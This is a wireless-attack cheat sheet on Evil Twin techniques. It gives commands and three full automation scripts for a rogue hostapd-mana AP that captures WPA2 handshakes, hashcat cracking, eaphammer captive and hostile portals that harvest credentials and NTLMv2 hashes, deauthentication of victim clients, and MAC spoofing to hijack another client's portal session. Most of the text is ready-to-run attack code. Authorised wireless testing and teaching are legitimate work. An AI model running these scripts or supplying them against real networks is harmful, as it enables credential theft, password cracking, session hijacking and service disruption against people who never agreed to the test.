Overview

Evil Twin attacks use a rogue AP that impersonates a legitimate network (same SSID and, for a client to accept it, the same security type the client has saved). Clients probing for a known network associate with the fake AP and, depending on how the rogue AP is set up, hand over a WPA2 handshake, portal credentials or session tokens.

Capture Handshake from Offline Network

If a network is not currently in range but clients are still probing for it, hostapd-mana can impersonate the AP and capture the WPA2 handshake when a client tries to connect. The passphrase in the config is arbitrary: the real PSK is unknown, but the client's message 2 of the 4-way handshake (its MIC over the nonces) is enough to crack offline. The interface must be in managed mode, not monitor mode, and a client only associates if it saved the SSID as WPA2-PSK (a client that knows the network as open will not join a WPA2 beacon). hostapd.conf:
interface=wlan1
driver=nl80211
hw_mode=g
channel=1
ssid=<TARGET-SSID>
# hostapd-mana appends every captured handshake to this hccapx file
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
# placeholder; the real PSK is neither known nor needed for the capture
wpa_passphrase=12345678
Launch the rogue AP (as root):
hostapd-mana hostapd.conf
hostapd prints AP-STA-POSSIBLE-PSK-MISMATCH <client MAC> when a client's message 2 fails verification against the bogus passphrase. At that point the handshake has been written to hostapd.hccapx and the AP can be stopped with CTRL+C.

Crack Captured Handshake with Hashcat

Convert the .hccapx to hashcat's 22000 format (hcxhash2cap rebuilds a pcap from the hccapx, hcxpcapngtool then emits the 22000 hash line):
hcxhash2cap --hccapx=hostapd.hccapx -c aux.pcap
hcxpcapngtool aux.pcap -o hash.22000
hashcat -a 0 -m 22000 hash.22000 ~/rockyou.txt --force
Legacy mode 2500 takes the .hccapx directly but has been deprecated since hashcat 6.0 (newer builds refuse it unless run with --deprecated-check-disable). --force only suppresses driver warnings and is not needed on a host with a working OpenCL or CUDA runtime:
hashcat -a 0 -m 2500 hostapd.hccapx ~/rockyou.txt --force
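The whole capture-and-convert procedure above as one script, added here as an example; it is not code from the original page or from the hostapd-mana or hcxtools projects. It writes the hostapd-mana config, watches hostapd's log for the AP-STA-POSSIBLE-PSK-MISMATCH event instead of waiting for a manual CTRL+C, then runs the 22000 conversion. Assumptions: hostapd-mana, hcxhash2cap, hcxpcapngtool and hashcat are on PATH, wlan1 is in managed mode, the event line format "wlan1: AP-STA-POSSIBLE-PSK-MISMATCH aa:bb:cc:dd:ee:ff" is hostapd's standard wpa_msg output, and ~/rockyou.txt is a hypothetical wordlist path.

```shell
#!/bin/sh
# Added example (not part of the original page): drive hostapd-mana until a
# client hands over its WPA2 handshake, then convert to hashcat 22000 format.
# Assumes hostapd-mana, hcxhash2cap, hcxpcapngtool and hashcat are on PATH and
# that the AP interface is in managed (not monitor) mode.

# Print a hostapd-mana config for a rogue WPA2-PSK AP.
# $1 = interface, $2 = SSID, $3 = channel, $4 = hccapx output file.
# The passphrase is a placeholder: we do not know the real PSK, we only need
# the client to send message 2 of the 4-way handshake so mana can record it.
write_mana_conf() {
    cat <<EOF
interface=$1
driver=nl80211
hw_mode=g
channel=$3
ssid=$2
mana_wpaout=$4
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
EOF
}

# Pull the station MAC out of an event line such as
# "wlan1: AP-STA-POSSIBLE-PSK-MISMATCH aa:bb:cc:dd:ee:ff" (hostapd's wpa_msg
# format, assumed here); prints nothing if the line is some other event.
sta_from_event_line() {
    printf '%s\n' "$1" |
        sed -n 's/.*AP-STA-POSSIBLE-PSK-MISMATCH \([0-9A-Fa-f:]\{17\}\).*/\1/p'
}

# Convert mana's hccapx ($1) to a 22000 hash file ($2) via an intermediate pcap.
hccapx_to_22000() {
    hcxhash2cap --hccapx="$1" -c "$1.pcap"
    hcxpcapngtool "$1.pcap" -o "$2"
}

main() {
    iface="$1"; ssid="$2"; channel="${3:-1}"
    conf="mana-$ssid.conf"; log="mana-$ssid.log"; hccapx="hostapd.hccapx"
    write_mana_conf "$iface" "$ssid" "$channel" "$hccapx" > "$conf"
    hostapd-mana "$conf" > "$log" 2>&1 &
    pid=$!
    echo "[*] rogue AP '$ssid' up on $iface ch$channel (pid $pid), waiting for a client"
    # hostapd logs AP-STA-POSSIBLE-PSK-MISMATCH right after checking message 2
    # against our bogus passphrase, which is exactly when the capture is done.
    # The loop also ends if hostapd-mana dies (bad interface, busy channel...).
    while kill -0 "$pid" 2>/dev/null; do
        line=$(grep -m1 'AP-STA-POSSIBLE-PSK-MISMATCH' "$log" || true)
        if [ -n "$line" ]; then
            echo "[+] handshake from $(sta_from_event_line "$line")"
            kill "$pid"
            break
        fi
        sleep 1
    done
    [ -s "$hccapx" ] || { echo "[-] no handshake written to $hccapx"; exit 1; }
    hccapx_to_22000 "$hccapx" hash.22000
    # --force is only needed on hosts without a working OpenCL/CUDA runtime
    hashcat -a 0 -m 22000 hash.22000 ~/rockyou.txt
}

# Runs only when called with arguments, e.g.:
#   sudo ./evil_twin_capture.sh wlan1 "Corp-WiFi" 6
if [ "$#" -ge 2 ]; then main "$@"; fi
```

The script polls the log file rather than piping hostapd-mana through `while read`, so the process can be killed the moment the event appears; with a pipe, the kill would have to happen from inside the reading subshell.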

Captive Portal Attack (eaphammer)

Clients probing for an open network can be lured to a rogue AP that serves a captive portal and harvests credentials through a fake login page. Run eaphammer as root; a leftover dnsmasq instance would conflict with the DHCP/DNS server eaphammer starts:
cd ~/tools/eaphammer
sudo killall dnsmasq
sudo ./eaphammer --essid <TARGET-OPEN-SSID> --interface wlan1 --captive-portal
If the client is currently attached to the real AP, deauthenticate it from a monitor-mode interface tuned to the real AP's channel so that it reconnects. A count of 0 deauths until interrupted; a finite count such as -0 5 gives the client a window to associate with the rogue AP:
iwconfig wlan0mon channel <CHANNEL>
aireplay-ng -0 0 wlan0mon -a <BSSID> -c <CLIENT-MAC>

Hostile Portal Attack (eaphammer + Responder)

The hostile portal (eaphammer's --hostile-portal, which starts a bundled Responder) captures NTLMv2 hashes from Windows clients: the portal pushes the client into an SMB/HTTP request that Windows answers with automatic NTLM authentication.
cd ~/tools/eaphammer
sudo killall dnsmasq
sudo ./eaphammer --essid <TARGET-SSID> --interface wlan1 --hostile-portal
Deauthenticate the client in parallel, as above:
iwconfig wlan0mon channel <CHANNEL>
aireplay-ng -0 0 wlan0mon -a <BSSID> -c <CLIENT-MAC>
Extract the NTLMv2 hashes (hashcat mode 5600) from the Responder session log and crack them. The awk field index relies on the "<date> <time> <AM/PM> - [PROTO] NTLMv2 Hash : <hash>" layout of Responder-Session.log, so inspect the output file before cracking; Responder also writes each hash on its own to per-client files such as logs/HTTP-NTLMv2-<client IP>.txt, which hashcat can read directly:
grep NTLMv2 logs/Responder-Session.log | grep Hash | awk '{print $9}' > responder.5600
hashcat -a 0 -m 5600 responder.5600 ~/rockyou.txt --force
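The captive-portal and hostile-portal procedures share the same orchestration (start eaphammer, deauth the client, harvest what Responder logged), so here is one script covering both, added as an example; it is not code from eaphammer, Responder or the original page. The hash extraction takes everything after "Hash :" instead of a fixed awk column, so it handles both the "[HTTP] NTLMv2 Hash" and "[SMB] NTLMv2-SSP Hash" spellings, and it deduplicates the repeats Responder logs on every retry. Assumptions: eaphammer is checked out at ~/tools/eaphammer (override with EAPHAMMER_DIR), wlan0mon was already put into monitor mode with airmon-ng, the script runs as root, ~/rockyou.txt is a hypothetical wordlist path, and the Responder-Session.log lines in sample_responder_log are constructed, not captured.

```shell
#!/bin/sh
# Added example (not part of eaphammer, Responder or the original page):
# bring up an eaphammer captive or hostile portal, deauth the target client in
# bursts so it has a window to rejoin, then pull NTLMv2 hashes out of
# Responder-Session.log. Assumes eaphammer at ~/tools/eaphammer (or
# $EAPHAMMER_DIR), wlan0mon in monitor mode, and root privileges.

EAPHAMMER_DIR="${EAPHAMMER_DIR:-$HOME/tools/eaphammer}"

# $1 = captive|hostile, $2 = ESSID, $3 = AP interface. Sets PORTAL_PID.
start_portal() {
    killall dnsmasq 2>/dev/null || true   # a stale dnsmasq blocks eaphammer's DHCP/DNS
    (cd "$EAPHAMMER_DIR" && exec ./eaphammer --essid "$2" --interface "$3" "--$1-portal") &
    PORTAL_PID=$!
}

# Deauth client $4 from AP $3 on channel $2 using monitor interface $1, in
# $5 (default 6) short bursts rather than the endless "-0 0": each pause is
# a chance for the client to associate with the rogue AP instead of the real one.
deauth_bursts() {
    mon="$1"; channel="$2"; bssid="$3"; client="$4"; rounds="${5:-6}"
    iwconfig "$mon" channel "$channel"
    i=0
    while [ "$i" -lt "$rounds" ]; do
        aireplay-ng -0 5 "$mon" -a "$bssid" -c "$client"
        sleep 10
        i=$((i + 1))
    done
}

# Print unique NTLMv2 hashes from a Responder-Session.log ($1). Lines look like
#   05/10/2024 09:12:33 AM - [HTTP] NTLMv2 Hash     : alice::CORP:1122...:AAAA...:0101...
#   05/10/2024 09:12:40 AM - [SMB] NTLMv2-SSP Hash     : bob::CORP:8877...:BBBB...:0101...
# Everything after "Hash :" is the hashcat 5600 line; "Client :" lines are skipped.
extract_ntlmv2() {
    sed -n 's/.*NTLMv2[^:]*Hash *: *//p' "$1" | sort -u
}

# Constructed Responder-Session.log excerpt (not a real capture) for a dry run.
sample_responder_log() {
    cat <<'EOF'
05/10/2024 09:12:33 AM - [HTTP] NTLMv2 Client   : 10.0.0.5
05/10/2024 09:12:33 AM - [HTTP] NTLMv2 Hash     : alice::CORP:1122334455667788:AAAA:0101
05/10/2024 09:12:40 AM - [SMB] NTLMv2-SSP Hash     : bob::CORP:8877665544332211:BBBB:0101
05/10/2024 09:12:41 AM - [SMB] NTLMv2-SSP Hash     : bob::CORP:8877665544332211:BBBB:0101
EOF
}

main() {
    mode="$1"; essid="$2"; channel="$3"; bssid="$4"; client="$5"
    start_portal "$mode" "$essid" wlan1
    deauth_bursts wlan0mon "$channel" "$bssid" "$client"
    if [ "$mode" = hostile ]; then
        extract_ntlmv2 "$EAPHAMMER_DIR/logs/Responder-Session.log" > responder.5600
        hashcat -a 0 -m 5600 responder.5600 ~/rockyou.txt
    fi
    echo "[*] portal still running as pid $PORTAL_PID; kill it when done"
}

# Usage: sudo ./portal.sh hostile "Corp-WiFi" 6 AA:BB:CC:DD:EE:FF 11:22:33:44:55:66
if [ "$#" -ge 5 ]; then main "$@"; fi
```

eaphammer is started through a subshell with exec so that the cd does not leak into the caller and $! is the eaphammer process itself, which makes it easy to kill once the engagement is over.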

MAC Spoofing to Bypass Captive Portal

If a captive portal gates access by MAC address and a connected client has already passed it, spoofing that client's MAC rides on its session: the portal cannot tell the two apart, though the legitimate client will see disruption while both use the same address. Pick an associated client from the station table of airodump-ng (its BSSID column shows which AP the client is attached to), then, as root:
systemctl stop NetworkManager
ip link set wlan1 down
macchanger -m <CLIENT-MAC> wlan1
ip link set wlan1 up
Reconnect with wpa_supplicant (open.conf holds a network block for the SSID with key_mgmt=NONE; -B backgrounds the daemon so the shell is free for dhclient) and request an address:
wpa_supplicant -B -Dnl80211 -i wlan1 -c open.conf
dhclient -v wlan1
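The client-selection step above is the part most often done by eye; the following script, added here as an example and not code from the original page, parses the airodump-ng CSV instead, picks the busiest client of the target BSSID, and then performs the spoof-and-join sequence. Assumptions: airodump-ng was run with -w scan to produce scan-01.csv (its two-table layout, AP rows followed by a "Station MAC," table whose field 6 is the associated BSSID, is airodump-ng's standard CSV format), macchanger, wpa_supplicant and dhclient are on PATH, the NetworkManager unit owns wlan1, and the CSV in sample_csv is constructed, not a real capture.

```shell
#!/bin/sh
# Added example (not part of the original page): choose an already-admitted
# client from an airodump-ng CSV, clone its MAC onto wlan1 and join the open
# SSID as that client. Assumes macchanger, wpa_supplicant and dhclient on PATH.

# Print station MACs associated to BSSID $2 from airodump CSV $1, busiest
# (most packets) first. The CSV has an AP table, a blank line, then a table
# headed "Station MAC,"; in that table field 5 is the packet count and field 6
# the BSSID, or "(not associated)" for clients that are only probing.
clients_of_bssid() {
    awk -F',' -v want="$(printf '%s' "$2" | tr 'a-f' 'A-F')" '
        { sub(/\r$/, "") }
        /^Station MAC/ { in_sta = 1; next }
        in_sta && NF >= 6 {
            gsub(/^ +| +$/, "", $1); gsub(/^ +| +$/, "", $5); gsub(/^ +| +$/, "", $6)
            if (toupper($6) == want) print $5, $1
        }' "$1" | sort -rn | awk '{ print $2 }'
}

# Minimal wpa_supplicant config for an open (no encryption) network $1.
open_conf() {
    cat <<EOF
ctrl_interface=/run/wpa_supplicant
network={
    ssid="$1"
    key_mgmt=NONE
}
EOF
}

# Take over MAC $2 on interface $1 and associate to SSID $3 (run as root).
spoof_and_join() {
    iface="$1"; mac="$2"; ssid="$3"
    systemctl stop NetworkManager    # otherwise it reverts the interface and reconnects
    ip link set "$iface" down
    macchanger -m "$mac" "$iface"
    ip link set "$iface" up
    open_conf "$ssid" > open.conf
    # -B backgrounds wpa_supplicant; without it the command blocks the shell
    wpa_supplicant -B -Dnl80211 -i "$iface" -c open.conf
    dhclient -v "$iface"
}

# Constructed airodump-ng CSV excerpt (not a real capture) for a dry run.
sample_csv() {
    cat <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:FF, 2024-05-10 09:00:00, 2024-05-10 09:05:00,  6,  54, OPN , ,   , -40,      120,        0,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2024-05-10 09:01:00, 2024-05-10 09:05:00, -55,       20, AA:BB:CC:DD:EE:FF, Guest
77:88:99:AA:BB:CC, 2024-05-10 09:02:00, 2024-05-10 09:05:00, -48,      150, AA:BB:CC:DD:EE:FF, 
DE:AD:BE:EF:00:01, 2024-05-10 09:03:00, 2024-05-10 09:04:00, -70,        3, (not associated), Guest,Corp-WiFi
EOF
}

main() {
    csv="$1"; bssid="$2"; ssid="$3"; iface="${4:-wlan1}"
    mac=$(clients_of_bssid "$csv" "$bssid" | head -n1)
    [ -n "$mac" ] || { echo "[-] no client associated to $bssid in $csv"; exit 1; }
    echo "[*] cloning $mac onto $iface"
    spoof_and_join "$iface" "$mac" "$ssid"
}

# Usage: sudo ./portal_bypass.sh scan-01.csv AA:BB:CC:DD:EE:FF Guest wlan1
if [ "$#" -ge 3 ]; then main "$@"; fi
```

The busiest client is chosen because a high packet count on the station row means it was actively passing traffic through the portal recently, so its MAC is the most likely to still have a live session.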